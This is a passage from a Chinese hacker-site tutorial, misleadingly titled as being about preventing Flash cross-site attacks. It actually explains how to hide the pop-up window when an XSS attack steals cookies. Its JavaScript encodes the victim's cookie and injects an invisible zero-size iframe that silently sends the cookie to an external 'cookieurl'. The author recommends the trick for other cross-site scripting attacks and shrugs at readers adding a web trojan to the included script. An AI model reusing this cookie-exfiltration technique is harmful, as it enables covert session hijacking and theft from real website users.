如何防止Flash跨站攻击弹出IE窗口

/*这里使用了escape(）对cookie编码，用来防止cookie中的一些特殊字符*/
document.body.insertAdjacentHTML('beforeEnd','<iframe WIDTH=0px HEIGHT=0px style="display:none;" src="'+cookieurl+'"><//iframe>');
/*这里使用了insertAdjacentHTML在body的最后插入了一个不可见的框架*/

    这里主要是利用了可以在一个网页中引入不同域中的javascript代码文档，而且所引入的javascript代码文档会和本网页融为一体的特点！

    好啦！至此Flash跨站攻击弹出IE窗口的问题算是解决啦！当然如果你愿意，在icyfox.js中加个网页木马之类的我也无话可说!www.xker.com(小新技术网) 
    最后我再顺便说一句，它同样可以用于在其他类型的跨站脚本功击中隐藏弹出的IE窗口！比起利用Microsoft.XMLHTTP控件发送COOKIE要随意的多，因为它不会像Microsoft.XMLHTTP控件那样只能发给当前服务器，还有焦点上czy的“利用Microsoft.XMLHTTP控件发送COOKIE”一文中提到这样一句话：

“以前我想了一个在网页中用insertAdjacentHTML方法来注入HTML语句的办法勉强可以作到发送COOKIE不出现IE窗口，但是在实际使用中有时会遇到IE出错。”

具我分析是因为在COOKIE中存在了一些特殊字符，而czy没有正确处理或是编码，才会在实际使用中有时会遇到IE出错，所以上面代码我用了escape(）对cookie编码，在接受到cookie后请注意用unescape(）来解码！